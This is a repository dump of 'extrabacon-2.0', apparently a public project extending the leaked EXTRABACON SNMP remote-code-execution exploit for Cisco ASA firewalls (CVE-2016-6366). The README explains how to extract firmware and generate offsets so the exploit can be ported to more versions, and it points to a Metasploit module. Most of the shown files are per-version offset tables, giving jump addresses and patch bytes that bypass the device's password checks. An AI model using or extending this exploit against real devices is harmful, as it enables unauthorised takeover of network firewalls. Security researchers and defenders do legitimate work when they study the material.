├── .gitignore ├── LICENSE ├── README.md ├── extrabacon-2.0 ├── Mexeggs │ ├── __init__.py │ ├── all.py │ ├── argparse.py │ ├── hexdump.py │ ├── log.py │ ├── loglib.py │ ├── sploit.py │ └── version.py ├── extrabacon_2.0.py ├── improved │ ├── grep-offsets.py │ ├── shellcode_8_0(2).py │ ├── shellcode_8_0(3).py │ ├── shellcode_8_0(3)6.py │ ├── shellcode_8_0(4).py │ ├── shellcode_8_0(4)32.py │ ├── shellcode_8_0(5).py │ ├── shellcode_8_2(1).py │ ├── shellcode_8_2(2).py │ ├── shellcode_8_2(3).py │ ├── shellcode_8_2(4).py │ ├── shellcode_8_2(5).py │ ├── shellcode_8_2(5)33.py │ ├── shellcode_8_2(5)41.py │ ├── shellcode_8_2(5)55.py │ ├── shellcode_8_3(1).py │ ├── shellcode_8_3(2).py │ ├── shellcode_8_3(2)39.py │ ├── shellcode_8_3(2)40.py │ ├── shellcode_8_4(1).py │ ├── shellcode_8_4(2).py │ ├── shellcode_8_4(3).py │ ├── shellcode_8_4(4).py │ ├── shellcode_8_4(4)1.py │ ├── shellcode_8_4(4)3.py │ ├── shellcode_8_4(4)5.py │ ├── shellcode_8_4(4)9.py │ ├── shellcode_8_4(6)5.py │ ├── shellcode_8_4(7).py │ ├── shellcode_9_0(1).py │ ├── shellcode_9_1(1)4.py │ ├── shellcode_9_2(1).py │ ├── shellcode_9_2(2)8.py │ ├── shellcode_9_2(3).py │ ├── shellcode_9_2(4).py │ └── shellcode_9_2(4)13.py ├── scapy │ ├── LICENSE │ ├── __init__.py │ ├── all.py │ ├── ansmachine.py │ ├── arch │ │ ├── __init__.py │ │ ├── bsd.py │ │ ├── linux.py │ │ ├── pcapdnet.py │ │ ├── solaris.py │ │ ├── unix.py │ │ └── windows │ │ │ └── __init__.py │ ├── as_resolvers.py │ ├── asn1 │ │ ├── __init__.py │ │ ├── asn1.py │ │ ├── ber.py │ │ └── mib.py │ ├── asn1fields.py │ ├── asn1packet.py │ ├── automaton.py │ ├── autorun.py │ ├── base_classes.py │ ├── config.py │ ├── crypto │ │ ├── __init__.py │ │ └── cert.py │ ├── dadict.py │ ├── data.py │ ├── error.py │ ├── fields.py │ ├── layers │ │ ├── __init__.py │ │ ├── all.py │ │ ├── bluetooth.py │ │ ├── dhcp.py │ │ ├── dhcp6.py │ │ ├── dns.py │ │ ├── dot11.py │ │ ├── gprs.py │ │ ├── hsrp.py │ │ ├── inet.py │ │ ├── inet6.py │ │ ├── ir.py │ │ ├── isakmp.py │ │ ├── l2.py │ │ ├── l2tp.py │ │ ├── llmnr.py │ │ ├── mgcp.py │ │ ├── mobileip.py │ │ ├── netbios.py │ │ ├── netflow.py │ │ ├── ntp.py │ │ ├── pflog.py │ │ ├── ppp.py │ │ ├── radius.py │ │ ├── rip.py │ │ ├── rtp.py │ │ ├── sebek.py │ │ ├── skinny.py │ │ ├── smb.py │ │ ├── snmp.py │ │ ├── tftp.py │ │ └── x509.py │ ├── main.py │ ├── modules │ │ ├── __init__.py │ │ ├── geoip.py │ │ ├── nmap.py │ │ ├── p0f.py │ │ ├── queso.py │ │ └── voip.py │ ├── packet.py │ ├── plist.py │ ├── pton_ntop.py │ ├── route.py │ ├── route6.py │ ├── sendrecv.py │ ├── supersocket.py │ ├── themes.py │ ├── tools │ │ ├── UTscapy.py │ │ ├── __init__.py │ │ └── check_asdis.py │ ├── utils.py │ ├── utils6.py │ └── volatile.py └── versions │ ├── converter.py │ ├── shellcode_asa802.py │ ├── shellcode_asa803.py │ ├── shellcode_asa803_6.py │ ├── shellcode_asa804.py │ ├── shellcode_asa804_32.py │ ├── shellcode_asa805.py │ ├── shellcode_asa821.py │ ├── shellcode_asa822.py │ ├── shellcode_asa823.py │ ├── shellcode_asa824.py │ ├── shellcode_asa825.py │ ├── shellcode_asa831.py │ ├── shellcode_asa832.py │ ├── shellcode_asa841.py │ ├── shellcode_asa842.py │ ├── shellcode_asa843.py │ └── shellcode_asa844.py ├── lina-offsets.py ├── metasploit ├── cisco_asa_extrabacon.rb └── cisco_asa_snmpoverflow.rb └── shellcode ├── clean.nasm ├── egg.nasm ├── genshellcode.py ├── shellcode.nasm └── writebytes.nasm /.gitignore: -------------------------------------------------------------------------------- 1 | # our files 2 | extrabacon-2.0/concernedparent/ 3 | 4 | # Byte-compiled / optimized / DLL files 5 | __pycache__/ 6 | *.py[cod] 7 | *$py.class 8 | 9 | # C extensions 10 | *.so 11 | 12 | # Distribution / packaging 13 | .Python 14 | env/ 15 | build/ 16 | develop-eggs/ 17 | dist/ 18 | downloads/ 19 | eggs/ 20 | .eggs/ 21 | lib/ 22 | lib64/ 23 | parts/ 24 | sdist/ 25 | var/ 26 | *.egg-info/ 27 | .installed.cfg 28 | *.egg 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *,cover 49 | .hypothesis/ 50 | 51 | # Translations 52 | *.mo 53 | *.pot 54 | 55 | # Django stuff: 56 | *.log 57 | local_settings.py 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # IPython Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # dotenv 82 | .env 83 | 84 | # virtualenv 85 | venv/ 86 | ENV/ 87 | 88 | # Spyder project settings 89 | .spyderproject 90 | 91 | # Rope project settings 92 | .ropeproject 93 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2016 RiskSense 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2016-6366 2 | 3 | Public repository for improvements to the EXTRABACON exploit, a remote code execution for Cisco ASA written by the Equation Group (NSA) and leaked by the Shadow Brokers. 4 | 5 | There is improved shellcode, a LINA offset finder script, a Metasploit module, and extrabacon-2.0. 6 | 7 | We are adding patches for most versions of 8.x and 9.x in the near future after we test all versions on real hardware. 8 | 9 | This is using improved shellcode, has less stages than the Equation Group version making it more reliable. This makes the SNMP payload packet ~150 less bytes. Also, the leaked version only supports 8.x, we have it working on 9.x versions. 10 | 11 | ### Supported Versions (so far) 12 | 13 | Using the Lina offset finder script, it should be trivial to support all vulnerable x86 versions. We are working on doing just that. NOTE: x64 (9.6+?) introduces DEP and ASLR. The offset finder and generic payload will not work. It should still be possible to easily dos these versions though. 14 | 15 | Open an issue if you would like us to support a specific version. It will move to the front of the line. 16 | 17 | 8.x 18 | - 8.0(2) 19 | - 8.0(3) 20 | - 8.0(3)6 21 | - 8.0(4) 22 | - 8.0(4)32 23 | - 8.0(5) 24 | - 8.2(1) 25 | - 8.2(2) 26 | - 8.2(3) 27 | - 8.2(4) 28 | - 8.2(5) 29 | - 8.2(5)33 `*` 30 | - 8.2(5)41 `*` 31 | - 8.2(5)55 `*` 32 | - 8.3(1) 33 | - 8.3(2) 34 | - 8.3(2)39 `*` 35 | - 8.3(2)40 `*` 36 | - 8.3(2)-npe `*` `**` 37 | - 8.4(1) 38 | - 8.4(2) 39 | - 8.4(3) 40 | - 8.4(4) 41 | - 8.4(4)1 `*` 42 | - 8.4(4)3 `*` 43 | - 8.4(4)5 `*` 44 | - 8.4(4)9 `*` 45 | - 8.4(6)5 `*` 46 | - 8.4(7) `*` 47 | 48 | 9.x 49 | - 9.0(1) `*` 50 | - 9.1(1)4 `*` 51 | - 9.2(1) `*` 52 | - 9.2(2)8 `*` 53 | - 9.2(3) `*` 54 | - 9.2(4) `*` 55 | - 9.2(4)13 `*` 56 | 57 | `*` new version support not part of the original Shadow Brokers leak 58 | 59 | `**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option? 60 | 61 | ### Metasploit 62 | 63 | `use auxiliary/admin/cisco/cisco_asa_extrabacon` 64 | 65 | https://github.com/rapid7/metasploit-framework/pull/7359 66 | 67 | Our initial pull request was merged into Metasploit master branch. We will still be contributing more offsets, which may be available here sooner depending on latency of future pull requests. 68 | 69 | ### Contributing 70 | If you can test ASA versions, consider forking this project and generating payloads. We could mass-generate the payloads, but we want to test to make sure every payload exits cleanly. 71 | 72 | You can add new payloads to the `extrabacon-2.0/improved/` folder after using `lina-offsets.py` to generate the file. Modules are named `shellcode_verstring.py`, where verstring is the version string returned by the ASA, with periods . replaced with underscores _ 73 | 74 | Also submit pull requests stripping any unnecessary Python from the ExtraBacon 2.0 code. 75 | 76 | ### Lina offset finder 77 | `python2 ./lina-offsets.py asa_lina_XXX.elf` 78 | 79 | Will automatically generate necessary offsets to port the exploit to other versions of ASA. 80 | 81 | Right now, it takes us longer to load a version of ASA firmware and test it, than it does to generate offsets for a specific version. 82 | 83 | The only thing the script doesn't calculate is FIX_EBP, which is usually 0x48 (72) or 0x58 (88). It seems like 8.4(1) and greater use 0x48. 84 | 85 | You can extract Lina like this: 86 | 87 | `binwalk -e asaXXX-k8.bin` 88 | `cd _asaXXX-extracted` 89 | `cpio -idv < rootfs.img` 90 | `cp asa/bin/lina /tmp/linaXXX` 91 | 92 | ### Licenses 93 | 94 | - ExtraBacon 2.0 Python code is GPLv2 (as it uses Scapy) 95 | - Metasploit module is MSF license (3-clause BSD) 96 | - Everything else is MIT 97 | 98 | 99 | ### References 100 | - http://zerosum0x0.blogspot.com/2016/09/reverse-engineering-cisco-asa-for.html 101 | - https://blog.silentsignal.eu/2016/08/25/bake-your-own-extrabacon/ 102 | - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp 103 | -------------------------------------------------------------------------------- /extrabacon-2.0/Mexeggs/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RiskSense-Ops/CVE-2016-6366/0ba7426a9bf2a01c807608b7e1b63f87fe2699a5/extrabacon-2.0/Mexeggs/__init__.py -------------------------------------------------------------------------------- /extrabacon-2.0/Mexeggs/all.py: -------------------------------------------------------------------------------- 1 | from sploit import * 2 | from version import * 3 | -------------------------------------------------------------------------------- /extrabacon-2.0/Mexeggs/hexdump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | 4 | def hexdump(x,lead="[+] ",out=sys.stdout): 5 | ''' 6 | 7 | 8 | 9 | 10 | ''' 11 | 12 | x=str(x) 13 | l = len(x) 14 | i = 0 15 | while i < l: 16 | print >>out, "%s%04x " % (lead,i), 17 | for j in range(16): 18 | if i+j < l: 19 | print >>out, "%02X" % ord(x[i+j]), 20 | else: 21 | print >>out, " ", 22 | if j%16 == 7: 23 | print >>out, "", 24 | print >>out, " ", 25 | print >>out, sane(x[i:i+16]) 26 | i += 16 27 | 28 | def sane(x): 29 | ''' 30 | 31 | ''' 32 | 33 | 34 | r="" 35 | for i in x: 36 | j = ord(i) 37 | if (j < 32) or (j >= 127): 38 | r=r+"." 39 | else: 40 | r=r+i 41 | return r 42 | -------------------------------------------------------------------------------- /extrabacon-2.0/Mexeggs/log.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | import loglib 4 | 5 | class Log(loglib.AbstractLog): 6 | def __init__(self, name, version): 7 | super(Log, self).__init__(name, version) 8 | 9 | def packet(self, event, data): 10 | return self(event, params = {'packet': ' '.join(['%02x' % ord(byte) for byte in data])}) 11 | 12 | -------------------------------------------------------------------------------- /extrabacon-2.0/Mexeggs/version.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import sys 4 | 5 | 6 | class DictionaryOfTuples: 7 | def __init__(self, filename, globals = None, locals = None): 8 | if not globals: 9 | globals = {} 10 | if not locals: 11 | locals = {} 12 | 13 | self.filename = filename 14 | 15 | 16 | lines = [] 17 | f = open(filename,'r') 18 | for line in f.readlines(): 19 | line = line.strip() 20 | if line.startswith('('): 21 | lines.append(line) 22 | f.close() 23 | 24 | 25 | expression = "[\n%s\n]" % "\n".join(lines) 26 | tuples = eval(expression, globals, locals) 27 | 28 | 29 | self.info = {} 30 | for e in tuples: 31 | if e[0] in self and self[e[0]] != e[1]: 32 | raise RuntimeError,"data mismatch -- %s has multiple values: %s and %s" % (e[0], self[e[0]], e[1]) 33 | else: 34 | self[e[0]] = e[1] 35 | 36 | def __len__(self): 37 | return len(self.info) 38 | 39 | def __contains__(self, item): 40 | return item in self.info 41 | 42 | def __getitem__(self, key): 43 | return self.info[key] 44 | 45 | def __setitem__(self, key, value): 46 | self.info[key] = value 47 | 48 | def has_key(self, key): 49 | return key in self 50 | 51 | def validate(self, required, verbose = False): 52 | valid = True 53 | 54 | for kw in required: 55 | if not kw in self: 56 | if verbose: print "Missing %s"%kw 57 | valid = False 58 | else: 59 | if verbose: print "Has %-20s =" % kw, _xprint(self[kw]) 60 | 61 | if verbose: 62 | if valid: 63 | print "verinfo file is valid" 64 | else: 65 | print "verinfo file is not valid" 66 | 67 | print '-'*40 68 | 69 | return valid 70 | 71 | def dump(self, req, opt, verbose = 0): 72 | out = "" 73 | 74 | for kw in opt: 75 | if kw in self: 76 | out += '("%s","%s"),\n' % (kw, _xprint(self[kw])) 77 | out += "#-"*30 + '\n' 78 | for kw in req: 79 | out += '("%s","%s"),\n' % (kw, _xprint(self[kw])) 80 | 81 | return out 82 | 83 | 84 | def _xprint(x): 85 | try: out = '0x%x'%(long(x)&0xffffffffL) 86 | except: out = '"%s"'%x 87 | return out 88 | 89 | 90 | if __name__ == '__main__': 91 | import unittest 92 | import version_test 93 | runner = unittest.TextTestRunner() 94 | runner.run(version_test.suite) 95 | 96 | -------------------------------------------------------------------------------- /extrabacon-2.0/improved/grep-offsets.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | """ 4 | Crappy script that reads the offsets in the Metasploit module, 5 | turns it into json, and write Python files 6 | """ 7 | 8 | import json 9 | 10 | def parse_offsets(data): 11 | data = data.split("@offsets = {")[1] 12 | data = data.split("}")[0] 13 | 14 | str = "{" 15 | for line in data.split("\n"): 16 | line = line.strip() 17 | line = line.split("#")[0] 18 | str += line 19 | 20 | str += "}" 21 | data = json.loads(str.replace("=>", ":")) 22 | 23 | for key, value in data.iteritems(): 24 | str = "##\n## this file autogenerated\n" 25 | str += "## " + key + "\n##\n\n" 26 | 27 | str += "jmp_esp_offset = \"" + value[0] + "\"\n" 28 | str += "saferet_offset = \"" + value[1] + "\"\n" 29 | str += "fix_ebp = \"" + value[2] + "\"\n" 30 | str += "pmcheck_bounds = \"" + value[3] + "\"\n" 31 | str += "pmcheck_offset = \"" + value[4] + "\"\n" 32 | str += "pmcheck_code = \"" + value[5] + "\"\n" 33 | str += "admauth_bounds = \"" + value[6] + "\"\n" 34 | str += "admauth_offset = \"" + value[7] + "\"\n" 35 | str += "admauth_code = \"" + value[8] + "\"\n" 36 | 37 | str += '\n\n# "%s" = ["%s"],' % (key, '","'.join(value)) 38 | 39 | fname = "shellcode_" + key.replace(".", "_") + ".py" 40 | print fname 41 | with open(fname, "w") as f: 42 | f.write(str) 43 | 44 | if __name__ == '__main__': 45 | import sys 46 | data = open(sys.argv[1]).read() 47 | parse_offsets(data) 48 | -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_0(2).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.0(2) 4 | ## 5 | 6 | jmp_esp_offset = "155.222.211.8" 7 | saferet_offset = "44.103.159.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.224.6.9" 10 | pmcheck_offset = "32.237.6.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.80.6.8" 13 | admauth_offset = "48.90.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.0(2)" = ["155.222.211.8","44.103.159.8","88","0.224.6.9","32.237.6.9","85.49.192.137","0.80.6.8","48.90.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_0(3).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.0(3) 4 | ## 5 | 6 | jmp_esp_offset = "141.123.131.9" 7 | saferet_offset = "156.138.160.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.128.9.9" 10 | pmcheck_offset = "112.130.9.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.96.6.8" 13 | admauth_offset = "176.96.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.0(3)" = ["141.123.131.9","156.138.160.8","88","0.128.9.9","112.130.9.9","85.49.192.137","0.96.6.8","176.96.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_0(3)6.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.0(3)6 4 | ## 5 | 6 | jmp_esp_offset = "191.143.24.9" 7 | saferet_offset = "28.158.161.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.0.11.9" 10 | pmcheck_offset = "224.1.11.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.96.6.8" 13 | admauth_offset = "112.101.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.0(3)6" = ["191.143.24.9","28.158.161.8","88","0.0.11.9","224.1.11.9","85.49.192.137","0.96.6.8","112.101.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_0(4).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.0(4) 4 | ## 5 | 6 | jmp_esp_offset = "109.188.26.9" 7 | saferet_offset = "140.100.168.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.96.19.9" 10 | pmcheck_offset = "128.101.19.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.96.6.8" 13 | admauth_offset = "176.104.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.0(4)" = ["109.188.26.9","140.100.168.8","88","0.96.19.9","128.101.19.9","85.49.192.137","0.96.6.8","176.104.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_0(4)32.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.0(4)32 4 | ## 5 | 6 | jmp_esp_offset = "157.6.31.9" 7 | saferet_offset = "44.20.171.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.176.23.9" 10 | pmcheck_offset = "0.176.23.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.96.6.8" 13 | admauth_offset = "48.105.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.0(4)32" = ["157.6.31.9","44.20.171.8","88","0.176.23.9","0.176.23.9","85.49.192.137","0.96.6.8","48.105.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_0(5).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.0(5) 4 | ## 5 | 6 | jmp_esp_offset = "253.116.31.9" 7 | saferet_offset = "204.64.171.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.32.24.9" 10 | pmcheck_offset = "64.32.24.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.96.6.8" 13 | admauth_offset = "128.107.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.0(5)" = ["253.116.31.9","204.64.171.8","88","0.32.24.9","64.32.24.9","85.49.192.137","0.96.6.8","128.107.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(1).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(1) 4 | ## 5 | 6 | jmp_esp_offset = "147.242.43.9" 7 | saferet_offset = "108.154.181.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.0.36.9" 10 | pmcheck_offset = "240.14.36.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.208.6.8" 13 | admauth_offset = "16.215.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(1)" = ["147.242.43.9","108.154.181.8","88","0.0.36.9","240.14.36.9","85.49.192.137","0.208.6.8","16.215.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(2).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(2) 4 | ## 5 | 6 | jmp_esp_offset = "150.54.28.9" 7 | saferet_offset = "124.0.184.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.224.41.9" 10 | pmcheck_offset = "32.227.41.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.208.6.8" 13 | admauth_offset = "64.221.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(2)" = ["150.54.28.9","124.0.184.8","88","0.224.41.9","32.227.41.9","85.49.192.137","0.208.6.8","64.221.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(3).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(3) 4 | ## 5 | 6 | jmp_esp_offset = "45.0.7.8" 7 | saferet_offset = "252.42.185.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.96.43.9" 10 | pmcheck_offset = "128.111.43.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.240.6.8" 13 | admauth_offset = "144.241.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(3)" = ["45.0.7.8","252.42.185.8","88","0.96.43.9","128.111.43.9","85.49.192.137","0.240.6.8","144.241.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(4).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(4) 4 | ## 5 | 6 | jmp_esp_offset = "93.172.49.9" 7 | saferet_offset = "236.91.185.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.176.43.9" 10 | pmcheck_offset = "96.187.43.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.240.6.8" 13 | admauth_offset = "16.242.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(4)" = ["93.172.49.9","236.91.185.8","88","0.176.43.9","96.187.43.9","85.49.192.137","0.240.6.8","16.242.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(5).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(5) 4 | ## 5 | 6 | jmp_esp_offset = "253.13.54.9" 7 | saferet_offset = "156.229.185.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.16.48.9" 10 | pmcheck_offset = "96.28.48.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.240.6.8" 13 | admauth_offset = "64.242.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(5)" = ["253.13.54.9","156.229.185.8","88","0.16.48.9","96.28.48.9","85.49.192.137","0.240.6.8","64.242.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(5)33.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(5)33 4 | ## 5 | 6 | jmp_esp_offset = "157.218.29.8" 7 | saferet_offset = "236.190.186.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.80.50.9" 10 | pmcheck_offset = "96.92.50.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.240.6.8" 13 | admauth_offset = "192.242.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(5)33" = ["157.218.29.8","236.190.186.8","88","0.80.50.9","96.92.50.9","85.49.192.137","0.240.6.8","192.242.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(5)41.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(5)41 4 | ## 5 | 6 | jmp_esp_offset = "77.90.18.8" 7 | saferet_offset = "188.9.187.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.160.50.9" 10 | pmcheck_offset = "16.168.50.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.240.6.8" 13 | admauth_offset = "16.243.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(5)41" = ["77.90.18.8","188.9.187.8","88","0.160.50.9","16.168.50.9","85.49.192.137","0.240.6.8","16.243.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_2(5)55.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.2(5)55 4 | ## 5 | 6 | jmp_esp_offset = "237.237.29.8" 7 | saferet_offset = "156.51.187.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.224.50.9" 10 | pmcheck_offset = "48.235.50.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.240.6.8" 13 | admauth_offset = "16.243.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.2(5)55" = ["237.237.29.8","156.51.187.8","72","0.224.50.9","48.235.50.9","85.49.192.137","0.240.6.8","16.243.6.8","85.137.229.87"], 18 | -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_3(1).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.3(1) 4 | ## 5 | 6 | jmp_esp_offset = "111.187.14.8" 7 | saferet_offset = "140.140.194.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.112.53.9" 10 | pmcheck_offset = "240.119.53.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.208.6.8" 13 | admauth_offset = "48.221.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.3(1)" = ["111.187.14.8","140.140.194.8","88","0.112.53.9","240.119.53.9","85.49.192.137","0.208.6.8","48.221.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_3(2).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.3(2) 4 | ## 5 | 6 | jmp_esp_offset = "220.203.69.9" 7 | saferet_offset = "252.36.195.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.80.54.9" 10 | pmcheck_offset = "144.84.54.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.208.6.8" 13 | admauth_offset = "16.222.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.3(2)" = ["220.203.69.9","252.36.195.8","88","0.80.54.9","144.84.54.9","85.49.192.137","0.208.6.8","16.222.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_3(2)39.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.3(2)39 4 | ## 5 | 6 | jmp_esp_offset = "143.212.14.8" 7 | saferet_offset = "124.48.196.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.128.59.9" 10 | pmcheck_offset = "176.136.59.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.224.6.8" 13 | admauth_offset = "32.228.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.3(2)39" = ["143.212.14.8","124.48.196.8","88","0.128.59.9","176.136.59.9","85.49.192.137","0.224.6.8","32.228.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_3(2)40.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.3(2)40 4 | ## 5 | 6 | jmp_esp_offset = "169.151.13.8" 7 | saferet_offset = "124.48.196.8" 8 | fix_ebp = "88" 9 | pmcheck_bounds = "0.128.59.9" 10 | 